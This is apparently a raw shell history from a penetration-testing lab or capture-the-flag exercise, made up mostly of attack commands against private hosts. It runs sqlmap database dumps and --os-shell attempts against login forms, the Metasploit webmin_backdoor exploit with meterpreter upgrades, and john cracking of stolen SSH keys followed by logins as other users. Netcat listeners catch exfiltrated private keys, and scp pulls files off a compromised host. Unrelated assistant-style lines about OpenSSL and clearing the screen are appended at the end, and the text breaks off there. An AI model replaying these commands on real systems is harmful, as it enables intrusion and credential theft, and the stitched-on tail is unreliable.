sqlmap -u  server/login.php --forms --crawl=2
sqlmap -u  server/login.php --forms
sqlmap -h
sqlmap -u  server/login.php --forms -a
sqlmap -u  server/login.php --forms -a
sqlmap -h
sqlmap -u  server/login.php --forms --current-user
sqlmap -u  server/login.php --forms -a
sqlmap -h
sqlmap -hh
sqlmap -u  server/login.php --forms -search
sqlmap -u  server/login.php --forms -search
sqlmap -u  server/login.php --forms -a
sqlmap -u  server/login.php --forms -search=FLAG
sqlmap -h
sqlmap -u  server/login.php --forms -tables
sqlmap -u  server/login.php --forms --tables
sqlmap --h
sqlmap -hh
sqlmap -u  server/login.php --forms --colums
sqlmap -u  server/login.php --forms --columns
sqlmap -h
sqlmap -u  server/login.php --forms --current-db
sqlmap -h
sqlmap -u  server/login.php --forms --passwords
sqlmap -h
sqlmap -u  server/login.php --forms --dump
ssh
ssh server
ssh server
ssh server harden
harden@student
ssh harden@student
ssh harden@server
sqlmap -u server/login.php --form --dump
sqlmap -u server/login.php --form --dump
ls -a
rm -rf .sqlmap
sqlmap -u server/login.php --form --dump
python2 sqlmap -u "server/login.php"
sqlmap -u "server/login.php"
sqlmap -u "server/login.php" --forms
cat /root/pwdlist.txt
sqlmap -u "server/login.php" --forms -dbs
sqlmap -u "server/login.php" --forms --dbs
sqlmap -u "server/login.php" -d app
sqlmap -u "server/login.php" -D app
sqlmap -u "server/login.php" -D app --forms
sqlmap -u "server/login.php" -D app --forms --dump-all
ssh harden@server
sqlmap -u "server/login.php"
sudo -s
ssh harden@server
sqlmap -u "server/login.php" --forms
sqlmap -u "server/login.php" --forms --dbs
sqlmap -u "server/login.php" --forms -D app --dump-all
sqlmap -u "server/login.php" --forms -D mysql --dump-all
nmap 10.1.0.3
ls
/var/www/html/uploads/script.php
ssh player@server
ssh player@server
/opt/level-5
/opt/level-5
/opt/level-5
/opt/level-5
/opt/level-5
/opt/level-5
/opt/level-5
nmap
nmap 100.100.100.4
nmap --help
nmap -sS -sV -p 548 --script=afp-ls 100.100.100.4
nmap --script=http-sql-injection server
ls
cd /var/www/html/
ls
cd ~
ssh server
ssh webadmin@server
ssh webadmin@server
ssh webadmin@servere
ssh webadmin@server
nmap server
nmap -sV --script=http-sql-injection server
ssh webadmin@server
exit
nmap server
man
man nmap
nmap -sC=http-sql-injection server
nmap --script=http-sql-injection server
nmap -sC http-sql-injection server
nmap --script=http-sql-injection server
ssh server webadmin
ssh webadmin@server
sqlmap
sqlmap -h
python2 sqlmap -u http://server/ --id=1
python2 sqlmap -u http://server/ --id=1
python2 sqlmap -u http://server/ --data="id=1"
sqlmap -u http://server/ --data="id=1"
sqlmap -u http://server/ --random-agent
sqlmap -u http://server/ --random-agent --forms --crawl=2
sqlmap -u http://server/ --forms --crawl=2
sqlmap -u http://server/ --tables  --forms
sqlmap -u http://server/ --tables  --forms
sqlmap -u http://server/ --tables  --forms
sqlmap -u http://server/ --tables "users"
sqlmap -u http://server/ --help
sqlmap -u http://server/ -D APP
sqlmap -u http://server/ -D APP -T users --dump
sqlmap -u http://server/ --forms -D app -T users --dump
sqlmap -u http://server/ --help
sqlmap -u http://server/ --os-shell
sqlmap -u http://server/user.php?user=admin --os-shell
ssh bob@server
sqlmap
sqlmap -h
sqlmap -u http://server/
sqlmap -a http://server/
sqlmap -u http://server/
sql
sql
sqlmap -u http://server/ --forms -crawl=2
sqlmap -u http://server/ --forms --crawl=2
sqlmap -u http://server/ --forms
sqlmap -h
sqlmap -u http://server/ --forms --test-filter=SLEEP
sqlmap -a http://server/ --forms --test-filter=SLEEP
sqlmap -u http://server/ --forms --test-filter=SLEEP -table
sqlmap -u http://server/ --forms --test-filter=SLEEP --table
sqlmap -u http://server/ --forms --test-filter=SLEEP --tables
sqlmap -u http://server/ --forms --test-filter=SLEEP -D app -T users
sqlmap -u http://server/ --forms --test-filter=SLEEP -D app -T users --columns
sqlmap -hh
sqlmap -u http://server/ --forms --test-filter=SLEEP -D app -T users -C password --dump
sqlmap -u http://server/ --forms --test-filter=SLEEP -D app -T users -C password, users --dump
sqlmap -u http://server/ --forms --test-filter=SLEEP -D app -T users -C password, users --dump --hex
sqlmap -u http://server/ --forms --test-filter=SLEEP -D app -T users -C password, username --dump --hex
sqlmap -u http://server/ --forms --test-filter=SLEEP -D app -T users -C password, username --dump
sqlmap -u http://server/ --forms --test-filter=SLEEP -D app -T users -C password,username --dump
cd var/www/html
sqlmap -u http://server/ --os-shell
sqlmap -u http://server/ --forms --crawl=2 --os-shell
sqlmap -u http://server/user.php?user=admin --os-shell
sqlmap -u http://server/user.php?user=admin --os-shell
ssh
ssh bob@server
Nmap
nmap 10.1.26.9:5050
sudo nmap 10.2.26.9:5050
nmap 10.1.26.9
ls
nsfconsole
module exploit/webapp/webmin_backdoor
ls
cd Documents/
ls
cd ..
ssh 10.1.26.9
exploit -j
use exploit/unix/webapp/webmin_backdoor
use metasploit
use exploit
msfconsole
use explot/unix/webapp/webmin_backdoor
use exploit/unix/webapp/webmin_backdoor
set RHOST 10.1.26.9
set LHOST 10.1.135.83
set SSL true
set TARGET 1
cd usr
cd share
ls
john best_key
ls
cat best_key
ssh2john
ssh john
./john.exe
./john
cd john
./john.exe best_key
.\john.exe
ssh2john id_rsa > best_key
ls
cd Documents/
ls
cd ..
john --worldlist=fasttrack.txt best_key
john best_key
cd usr/share/john
.john
cd usr/share/john
pwd
pwd
cd /usr/share/john
pwd
ls
ssh2john.py best_key > best_key.hash
cd ..
cd ..
cd ..
ls
cd ..
ls
pwd
cd ..
pwd
cd root
pwd
/usr/share/john/ssh2john.py best_key > best_key.hash
pwd
ls
/usr/share/john/ssh2john.py best_key > best_key.hash
/usr/share/john/ssh2john.py best_key
cat best_key
cat authorized_keys
ls
rm best_key
ls
rm best_key.hash
ls
/usr/share/john/ssh2john.py best_key > best_key.hash
ls
john --worldlist=/usr/share/worldlist/fasttrack.txt best_key.hash
john --wordlist=/usr/share/worldlist/fasttrack.txt best_key.hash
john --wordlist=/usr/share/worldlists/fasttrack.txt best_key.hash
john --wordlist=/usr/share/wordlists/fasttrack.txt best_key.hash
ssh Iwillcrushyou@remoteserver
ssh -i Iwillcrushyou@10.1.17.4
ssh -i [-J Iwillcrushyou@10.1.17.4]
ssh  Iwillcrushyou@10.1.17.4
ssh [-i best_key.hash] Iwillcrushyou@10.1.17.4
ssh -i best_key.hash Iwillcrushyou@10.1.17.4
ssh -i best_key Iwillcrushyou@10.1.17.4
chmod 400 best_key
ssh -i best_key Iwillcrushyou@10.1.17.4
ip config
ipconfig
ip help
ip
ls
connect
nmap
nmap -sL
nmap -sL 10.1.26.9:5050
nmap -v -sn 10.1.26.9:5050
nmap -v -sn 10.1.26.9
nmap -sL 10.1.26.9
nmap  10.1.26.9
ip localhost:10000
metasploit
nmap 10.1.26.9
nsf
run
use
msf
msf5
msfconsole
msfconsole
use exploit/windows/smb/psexec
set RHOST 10.1.26.9
set RPORT 10000
exploit
use exploit/unix/webapp/webmin_backdoor
exploit -j
set LHOST 10.1.26.9
set RHOST 10.1.26.9
exploit
exploit -j
set RPORT 10000
exploit 
set LPORT 10000
exploit
search portscan
set LHOST 10.1.135.83
set SSL true
set TARGET 1
ls
cat best_key
cd /john
ls
$ /usr/sbin/john best_key
/usr/sbin/mailer best_key
john
john best_key
unafs
unshadow
python ssh2john.py best_key > best_key.hash
ls
locate ssh2john.py
python /usr/share/john/ssh2john.py best_key > best_key.hash
john best_key.hash /usr/share/wordlists/fasttrack.txt
john best_key.hash --wordlist=/usr/share/wordlists/fasttrack.txt
ls
cat best_key.hash
john best_key.hash --wordlist=/usr/share/wordlists/fasttrack.txt
ssh Iwillcrushyou@10.1.26.9
ssh Iwillcrushyou@10.1.17.4
ssh -i best_key Iwillcrushyou@10.1.17.4
chmod 400 best_key
ssh -i best_key Iwillcrushyou@10.1.17.4
nmap 10.1.26.9:5050
nmap 10.1.26.9
msf console
msfconsole
use exploit/unix/webmin_backdoor
use exploit/unix/webapp/webmin_backdoor
show targets
exploit
set target 0
exploit
show options
set target 1
set rhost 10.1.26.9
set lhost 10.1.135.83
set ssl true
exploit
exit
cd /usr/share/john
ls
ls
cd Dowloads
cd Downloads
ls
ls -a
cd /root
ls
cd Downloads/
ls
cd ..
ls
ls -a
cd .ssh
ls
cd best_key
/usr/share/john/ssh2john.py best_key > best?key.hash
ls
/usr/share/john/ssh2john.py best_key > best_key.hash
/usr/share/john/john.exe /usr/share/worldlists/fastcrack.txt best_key.hash
cat best_key.hash
john --wordlist=/usr/share/worldlists/fastcrack.txt best_key.hash
john --wordlist=/usr/share/worldlists/fasttrack.txt best_key.hash
john --wordlist=/usr/share/wordlists/fasttrack.txt best_key.hash
su Iwillcrushyou
cd ~
ssh Iwillcrushyou
ssh 10.1.17.4
ssh
pwd
ls
ssh -i ./.ssh/best_key 10.1.17.4
ssh -i /.ssh/best_key Iwillcrushyou@client
ssh -i ./.ssh/best_key Iwillcrushyou@client
ssh -i ./.ssh/best_key Iwillcrushyou@client
ssh -i ./.ssh/best_key Iwillcrushyou@client
cd .ssh
chmod 600 best_key
ls -al
ssh -i ./.ssh/best_key Iwillcrushyou@client
cd ..
ssh -i ./.ssh/best_key Iwillcrushyou@client
nmap -sV
nmap -sV 10.1.26.9
ssh 10.1.26.9
nmap 10.1.26.9
nmap -Pn --script vuln 10.1.26.9
nmap -sV --script=vuln 10.1.2
nmap -sV --script=vuln 10.1.26.9
mfs
mfsconsole
msfconsole
use exploit/unix/webapp/webmin_backdoor 
show options
set RHOST 10.1.26.9
set LHOST 10.1.135.83
set SSL true
show options
use exploit/
use exploit/webmin_backdoor
use exploit/webapp
exploit
search shell_to_meterpreter
use post/multi/manage/shell_to_meterpreter 
sessions -l
set SESSION 1
exploit
sessions -i
sessions -i 2
exit
ls
cat id_rsa
cksum id_rsa
john
locate sshjohn.py
cp $(locate sshjohn.py)
cp $(locate sshjohn.py) .
cp $(locate sshjohn.py) .
python sshjohn.py id_rsa > id_rsa.hash
cp $(locate ssh2john.py) .
python sshjohn.py id_rsa > id_rsa.hash
python ssh2john.py id_rsa > id_rsa.hash
locate rockyou.txt
cp $(locate rockyou.txt) .
gunzip rockyou.txt.gz
john id_rsa.hash -worlist=rockyou.txt
john id_rsa.hash -wordlist=rockyou.txt
ssh 10.1.17.4
chmod 644
chmod 600 id_rsa
ssh 10.1.17.4
ls
chmod 600 id_rsa.hash
ssh 10.1.17.4
ssh -i id_rsa.hash bob@10.1.17.4
ssh -i id_rsa bob@10.1.17.4
ls
cd Documents/
ls
cd home
ls
cd ..
ls
cd health
ls
cd ..
ls social
cd ..
cd ..
ls
cd private
ls
cd Documents/
ld
ls
cd Docs/
ls
cd work
cd ..
cd email
ls
cd work
ls
sha512sum /* | grep 206ce87678
sha512sum * | grep 206ce87678
ls
cat CEOMNlPM
nmap svvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
nmap 10.1.26.9
nmap -sn -P22 10.1.26.9
nmap -sn -PS22 10.1.26.9
nmap --help
nmap --script=vuln 10.1.26.9
metasploit --help
msfconsole
use exploit/unix/webapp/webmin_backdoor
show targets
set TARGET 0
show options
set SSL true
set RHOST 10.1.26.9
set LHOST 10.1.135.83
nc -l -p 1234 > out.txt
ls
rm out.txt
nc -l -p 1234 > id_rsa
vim id_rsa
ls
ls -l
ls -l
nc -l -p 1234 > id_rsa
ls -l
ls -l
exploit
ls -l
ls -l
ls -l
nc -l -p 1234 > id_rsa
nc -l -p 51071 > id_rsa
ls -l
quit
msfconsole
use exploit/unix/webapp/webmin_backdoor
show targets
set TARGET < 0
show options
set RHOST 10.1.26.9
set LHOST 10.1.135.83
set SSL true
exploit
set RHOST 10.1.26.9
exploit
show options
exploit
ping 10.1.26.9
quit
msfconsole
use exploit/unix/webapp/webmin_backdoor
show options
set SSL true
set RHOST 10.1.26.9
set LHOST 10.1.135.83
rm id_rsa
nc -l -p 51071 > id_rsa
ls -l
rm id_rsa
exploit
use post/multi/manage/shell_to_meterpreter
set SESSION 1
exploit
sessions
ls -l
cksum id_rsa
john
locate ssh2john.py
python /user/share/john/ssh2john.py id_rsa id_rsa.hash
python /usr/share/john/ssh2john.py id_rsa id_rsa.hash
python /usr/share/john/ssh2john.py id_rsa > id_rsa.hash
ls
cd usr/share/
cd /usr/share/
ls
cd ../..
ls
cd /home/kali
cd /home
ls
cd debian/
ls
ls -a
cd /root
ls
gunzip /usr/share/wordlist
gunzip /usr/share/wordlist/rockyou.txt.gz
gunzip /usr/share/wordlists/rockyou.txt.gz
ls
ls -a
ls
cp /usr/share/wordlists/rockyou.txt
cp /usr/share/wordlists/rockyou.txt .
ls
john id_rsa.hash -wordlists=rockyou.txt
john id_rsa.hash -wordlist=rockyou.txt
ls
ssh 10.1.17.4
ssh --help
ssh bob@10.1.17.4 -i id_rsa
chmod 600 id_rsa
ssh bob@10.1.17.4 -i id_rsa
ls
cd Documents/
ls
cd health/
ls
sha
sham512
sha512 sum
sha512
sha512sum
cd ..
sha512sum health/
sha512sum health/*
sha512sum health/* | grep 206ce87678
cd ..
ls
sha512sum ./* | grep 206ce87678
ls
sha512sum Documents/* | grep 206ce87678
cd Documents/
sha512sum social/* | grep 206ce87678
sha512sum home/* | grep 206ce87678
ls -a
cd ..
ls -a
cd ..
ls
cd private
ls
cd Documents/
ls
cd Docs/
ls
find --help
xargs --help
find * | xargs sha512sum | grep 206ce87678
find ./ | xargs sha512sum | grep 206ce87678
cat ./email/work/CEOMNlPM
ipconfig
ifconfig
nmap 192.168.128.49
nmap 10.1.26.9
nmap --help
nmap -v 192.168.128.49
nmap -V ..
nmap -v 192.168.128.49.
nmap -v 10.1.26.9
nmap -sV=vulscan-vulscan.nse  10.1.26.9
nmap -sV 10.1.26.9
nmap 10.1.26.9 --script=vuln
dir
find / hoax.txt
find -f hoax.txt
find / -f hoax.txt
find / -type f -name hoax.txt
find / -type f -name "*.txt"
find / -type f -name "hoax.txt"
webmin
websearch
metasploit
./msfconsole
msfconsole
 use explit/unit/webapp/webmin_backdoor
 use explit/unix/webapp/webmin_backdoor
 use exploit/unix/webapp/webmin_backdoor
set RHOST 10.1.26.9
set LHOST 10.1.135.83
set SSL true
exploit
use post/multi/manage/shell_to_meterpreter
set SESSION 1
exploit
cksum id_rsa
cd /usr/share/wordlists
dir
cp /usr/share/worldlists/rockyou.txt.gz
dir
gunzip rockyou.txt.gz
cp /usr/share/john/ssh2john.py
cp /usr/share/john/ssh2john.py .
python ssh2john.py id_rsa > hash
john hash -worldlist=rockyou.txt
dir
john hash -wordlist=rockyou.txt
dir
chmod 600 id_rsa
ssh -i id_rsa bob@10.1.17.4
dir
ssh -i id_rsa bob@10.1.17.4
sha512sum /home/private/Documents/Docs/email/work/* | grep 206ce87678
cat /home/private/Documents/Docs/email/work/CEOMNlPM
nmap -p- 10.1.26.9
metasploit --help
nc --help
nc -h
ssh 10.1.26.9
nc 10.1.26.9 -p 10000
nmap --help
ls
nmap -p- 10.1.26.9 -sC
metasploit
metasploit
msf
msfconsole
help
search name:Webmin
info expliot/unix/webapp/webmin_backdoor
info exploit/unix/webapp/webmin_backdoor
use exploit/unix/webapp/webmin_backdoor
show options
set LHOST 147.251.232.148
set RHOST 10.1.26.9
set SSL true
show options
exploit
ifconfig
set LHOST 10.1.135.83
exploit
set LPORT 8080
exploit
crc32
cksum
cksum -h
cksum --help
pwpd
pwd
cd ~
cd Desktop/
ls
ls
cd
ls
cksum ssh-key.txt
cksum ssh-key.txt
cksum ssh-key.txt
nc -u -l 9999
nc -u -l -p 9999
nc -u -l -p 9999 -q 1 > keyfile
search shell_to_meterpreter
use multi/manage/shell_to_meterpreter
sessions -l
set LPORT 8080
set SESSION 3
show options
exploit
sessions -i 3
sessions -l
ls
rm keyfile
rm ssh-key.txt
cat id_rsa
cksum id_rsa
ls
l
ls
ls
nmap 10.1.26.9
netstat - lepunt
man stat
man netstat
nmap 10.1.26.9
man nmap
tmux
EXIT
exit
ls
vim most_common_passwords_of_my_enemies.txt
man nmap
nmap --help
nmap 10.1.26.9
nmap 10.1.26.9 -A
nmap 10.1.26.9 -A -V
nmap 10.1.26.9 -A -v
ls
ls
ls -lR
LS
ls
cat most_common_passwords_of_my_enemies.txt
cd /etc/
ls
exit
ls -lR
ls
ls media
find . "module"
find . "metasploit"
ls
ls lib
find . "s/metasploit/"
find / -name metasploit
cat /usr/share/metasploit-framework/lib/msf/core/modules/external/python/metasploit
cat /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/metasploit-credential-3.0.3/lib/metasploit
find / -name metasploit -executable
man find
find / -name metasploit -type f
find / -name metasploit -type e
find / -name metasploit
cat /usr/lib/python2.7/dist-packages/faraday/client/plugins/repo/metasploit
ls /usr/lib/python2.7/dist-packages/faraday/client/plugins/repo/metasploit
cat /usr/lib/python2.7/dist-packages/faraday/client/plugins/repo/metasploit/plugin.py
searchsploit webmin 1.920
cat exploits/linux/webapps/47293.sh
msfconsole
man msfconsole
msfconsole
search webmin
exit
vim exploits/linux/webapps/47293.sh
msfconsole
use exploits/linux/webapps/47293.sh
use /exploits/linux/webapps/47293.sh
show exploits
search webmin
use 3
show options
set RHOSTS 10.1.26.9
set LHOST 10.1.135.83
set SSL true
show options
exploit
run
exit
ls
john
ls
ls
cd /
ls
cd home
ls
exit
ls
john --wordlist=most_common_passwords_of_my_enemies.txt /temp/id_rsa
cat /temp/id_rsa
cd /temp
ls
ls
pwd
pwd
ls home
ls home/debian/
ls
john --wordlist=most_common_passwords_of_my_enemies.txt /temp/id_rsa
ls tmp
cat tmp/id_rsa
john --wordlist=most_common_passwords_of_my_enemies.txt temp/id_rsa
john temp/id_rsa --wordlist=most_common_passwords_of_my_enemies.txt
.\john.exe temp/id_rsa --wordlist=most_common_passwords_of_my_enemies.txt
man john
john temp/id_rsa
ls
pwd
cd tmp/
ls
john id_rsa
man john
john id_rsa -wordlist:../most_common_passwords_of_my_enemies.txt
cd
cd /usr/share/john
ls
python ssh2john.py
python ssh2john.py
cd
python /usr/share/john/ssh2john.py tmp/id_rsa
python /usr/share/john/ssh2john.py ./tmp/id_rsa
cd tmp
ls
cd tmp
cd temp
ls tmp
pew
pwd
ls
ls
exit
exit
/usr/share/john/ssh2john.py tmp/id_rsa most_common_passwords_of_my_enemies.txt
/usr/share/john/ssh2john.py tmp/id_rsa > pswd.txt
ls
john -- wordlist=most_common_passwords_of_my_enemies.txt pswd.txt
ls
john --
john -- wordlist
ls
john -- wordlist=most_common_passwords_of_my_enemies.txt pswd.txt
cat pswd.txt
john -- wordlist=most_common_passwords_of_my_enemies.txt pswd.txt
ls
cat most_common_passwords_of_my_enemies.txt
ls
john --wordlist=most_common_passwords_of_my_enemies.txt pswd.txt
ls
ssh -i tmp/id_rsa cni@10.1.17.4
ls tmp/id_rsa
ls tmp/id_rsa -l
chmod g-r
chmod o-r
chmod --help
chmod o-ugo
chmod 600 tmp/id_rsa
ssh -i tmp/id_rsa cni@10.1.17.4
ssh -i tmp/id_rsa cni@10.1.17.4
john --wordlist=most_common_passwords_of_my_enemies.txt pswd.txt
ssh -i tmp/id_rsa cni@10.1.17.4
ls
ls -alt
ls -all
pwd
cd /
ls
cd home/
ls
cd agentx/
ls
file *
exit
scp -i id_rsa cni@10.1.17.4:/home/agentx/file2
scp -i id_rsa cni@10.1.17.4:/home/agentx/file2 ./
scp -i tmp/id_rsa cni@10.1.17.4:/home/agentx/file2 ./
ls
open file2
gio open file2
nmap
nmap -sL -sS 10.1.26.9
nmap -sS 10.1.26.9
vim probe
metasploit
Show exploits
msfconsole
search rce
search webmin
set RHOST 10.1.26.9
use exploit/unix/webapp/webmin_show_cgi_exec
run
use exploit/unix/webapp/webmin_backdoor
run
set RHOSTS 10.1.26.9
run
set LHOST 10.1.26.9
run
search webmin
use exploit/unix/webapp/webmin_upload_exec
run
use exploit/unix/webapp/webmin_backdoor
set LHOST 10.1.135.83
set RPORT 10000
run
set LPORT 10000
run
set LPORT 4444
run
set RHOSTS 10.1.26.9
run
msfconsole
use unix/webapp/webmin_backdoor
set RHOST 10.1.26.9
set RHOSTS 10.1.26.9
set RPORT 10000
set LHOST 10.1.135.83
run
show options
set SSL true
set SSL true
run
ls
mkdir keys
ls
help
sessions 1
run
pwd
help
sessions -k 1
sessions -k 2
sessions -k 3
sessions -k 4
exit
curl http://ix.io/2IY2 > new_key && chmod 600 new-key
ls
ls -l
chmod 600 new_key
ls -l
mv new_key new-key
john --single /root/keys/id_rsa
ssh2john.py keys/id_rsa > processed-for-john
john --wordlist=/usr/share/wordlists/most_common_passwords.txt --format=SSH processed-for-john
ping 10.1.26.9
wget 10.1.26.9
get 10.1.26.9
GET 10.1.26.9
ping 10.1.26.9
nmap 10.1.26.9
nmap -help
nmap -sO 10.1.26.9
nmap-services 10.1.26.9
nmap -services 10.1.26.9
nmap -sL 10.1.26.9
nmap 10.1.26.9
nmap -sV http-apache-server-status
nmap -sV http-apache-server-status 10.1.26.9
msfconsole
help
connect 10.1.26.9
connect 10.1.26.9 -z
info <exploit>
info <Exploit>
info Exploit
info exploit
connect -h
search webmin
cd exploit/unix/webapp/webmin_upload_exec
cd exploit/unix/webapp
cd /exploit/unix/webapp
cd ~/exploit/unix/webapp
use exploit/unix/webapp/webmin_upload_exec
exit
msfconsole
use exploit/unix/webapp/webmin_upload_exec > set LHOST 10.1.26.9
exploit
exit
msfconsole
cd ..
cd ..
cd "python stuff"
cd ../..
cd "Development Files\python stuff"
cd "HelpCMD"
dir
nioced.bat
echo -n "testing" | openssl dgst -sha256 > hash.txt
openssl dgst -sha256 -out encrypted.txt
clrwindow
exit
To run OpenSSL encryption, you need a file to encrypt and a password. Can you please provide me with the name of the file and the password you would like to use for the encryption? You can do this by saying something like: "The file's name is 'example.txt' and the password is 'password'". Please always use fake passwords for security reasons.
The 'cls' command clears the screen in Windows, effectively deleting all previous command entries and their output from the command line window.
Here is the code: